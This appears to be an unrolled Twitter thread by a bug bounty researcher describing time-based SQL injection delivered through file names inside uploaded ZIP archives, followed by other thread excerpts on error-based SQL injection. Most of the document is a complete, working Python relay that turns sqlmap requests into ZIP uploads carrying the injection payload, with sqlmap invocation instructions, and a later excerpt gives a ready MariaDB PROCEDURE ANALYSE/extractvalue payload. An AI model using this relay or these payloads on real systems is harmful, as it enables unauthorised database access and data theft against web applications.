A few months ago @osiryszzz and I discovered an interesting case of SQL injection on a @SynackRedTeam target that was under black-box testing.

During recon we noticed that there was an unrestricted file upload mechanism available to any user. #bugbounty #bugbountytips /1
We noticed that the target was only processing ZIP files, but where the content was unzipped wasn't clear, which prevented potential RCE or file overwrite via ZIP bombing. /2
However, it appeared that each file entry inside the ZIP file was added to the database after unpacking, so we wanted to see if it was possible to achieve SQL injection simply by making a file name with a SQL injection payload. /3
We confirmed that it was vulnerable to time-based SQL injection, but how we were going to exploit it was in question.

I made a simple middleware proxy-like PHP script, such as gist.github.com/mcipekci/29eb8…, and we were able to exploit the issue. /4
We forced SQLmap to send requests to our script hosted on a C2 instance, which processed the payload and sent the data to the actual target.

It was a very unique case of SQL injection and was fun to exploit. /5
I hope this gives inspiration to go deeper, explore beyond what's visible, and create your own unique techniques and solutions for such cases.
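The relay the thread describes, written out here as an added Python example (it is not the author's PHP gist behind the truncated link above). Every detail about the target is an assumption made for illustration: the hypothetical upload URL `TARGET_UPLOAD_URL`, the multipart field name `archive`, and that sqlmap is pointed at the relay with a query parameter called `fn`. The relay packs each payload into a ZIP as the single entry's file name, uploads the archive, and only answers sqlmap once the target has answered, so the SLEEP delay is measured end to end.

```python
"""Relay that turns sqlmap's HTTP requests into ZIP uploads whose single
entry is named with the injection payload.

Added illustration, not the author's script. TARGET_UPLOAD_URL, FORM_FIELD
and the "fn" parameter are assumptions, not details from the engagement.
"""
import io
import urllib.error
import urllib.parse
import urllib.request
import zipfile
from http.server import BaseHTTPRequestHandler, HTTPServer

TARGET_UPLOAD_URL = "https://target.example/upload"  # assumption
FORM_FIELD = "archive"                                # assumption
LISTEN = ("127.0.0.1", 8008)
BOUNDARY = "sqlizipboundary"


def build_zip(entry_name: str, content: bytes = b"x") -> bytes:
    """Return a ZIP archive with one entry whose *name* is the payload.

    The ZIP format places almost no restrictions on entry names, so quotes,
    spaces, parentheses and comment markers travel untouched. A "/" would be
    read as a directory separator by the unpacker, so payloads that need one
    have to be reworked (e.g. with a sqlmap tamper script) before they get here.
    """
    if "\x00" in entry_name:
        raise ValueError("ZIP entry names cannot contain NUL")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(entry_name, content)
    return buf.getvalue()


def entry_names(zip_bytes: bytes) -> list:
    """Read back the entry names, i.e. exactly what the target will insert."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return zf.namelist()


def encode_multipart(field: str, filename: str, data: bytes,
                     boundary: str = BOUNDARY):
    """Build a multipart/form-data body carrying one file field.

    The *filename* in Content-Disposition is the archive's own name and is
    unrelated to the entry name inside the ZIP that carries the payload.
    """
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: application/zip\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + data + tail, f"multipart/form-data; boundary={boundary}"


def extract_payload(path: str, param: str = "fn") -> str:
    """Pull the injection payload out of the relay URL that sqlmap requested."""
    qs = urllib.parse.parse_qs(urllib.parse.urlparse(path).query)
    return qs.get(param, ["x"])[0]


class Relay(BaseHTTPRequestHandler):
    """Each GET from sqlmap becomes one ZIP upload to the real target."""

    def do_GET(self):
        payload = extract_payload(self.path)
        body, ctype = encode_multipart(FORM_FIELD, "upload.zip", build_zip(payload))
        req = urllib.request.Request(TARGET_UPLOAD_URL, data=body,
                                     headers={"Content-Type": ctype}, method="POST")
        # Time-based injection: sqlmap measures *our* response time, so we must
        # block until the target replies, and the timeout must stay above the
        # delay sqlmap injects (--time-sec, default 5).
        try:
            with urllib.request.urlopen(req, timeout=60) as resp:
                status, out = resp.status, resp.read()
        except urllib.error.HTTPError as exc:
            status, out = exc.code, exc.read()
        # Pass the target's status and body through so boolean-based
        # detection can still compare responses if the app reflects anything.
        self.send_response(status)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(out)


if __name__ == "__main__":
    # sqlmap -u "http://127.0.0.1:8008/?fn=x" -p fn --technique=T
    HTTPServer(LISTEN, Relay).serve_forever()
```

Run the relay, then point sqlmap at it with `-p fn --technique=T`; sqlmap never sees the upload form, it only sees a plain GET parameter whose response time tracks the target's. Keep `--time-sec` well below the `urlopen` timeout, and read back the archive with `entry_names` before a long run to confirm the unpacker will see the payload byte for byte.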

More from @mcipekci

Apr 20, 2022
As of today I passed the half-million milestone on @SynackRedTeam, with 200k of it in the last 90 days. This month is about to catch the previous one too; we will see what happens in the next 10 days :). #bugbounty #bugbountytips
Almost all my bugs this month were SQLis again. I'll try to give another example from the unique ones.
One of the targets had SQLi on some weird endpoint. It was expecting XML data, but it looks like it was looking for "xml" as a parameter.

Feb 26, 2022
On a recent engagement on a program on @SynackRedTeam, I found out that the target had error-based SQL injection in a LIMIT clause; it appeared that the DBMS was MariaDB 10.4.13, which limited the options that could be used in the injection. #bugbountytips #bugbounty 1/5
The only way to exploit the vulnerability was using PROCEDURE ANALYSE at the injection point. However, we were not able to use subqueries inside ANALYSE because it's not allowed. So our options were limited to fetching things like database(), user(), etc. 2/5
The payload for the injection was like this: 1+procedure+analyse(extractvalue(rand(),version()),1). However, this only allowed us to retrieve the version of the DBMS, so I started to check which other functions were available to use within the permissions of the current user. 3/5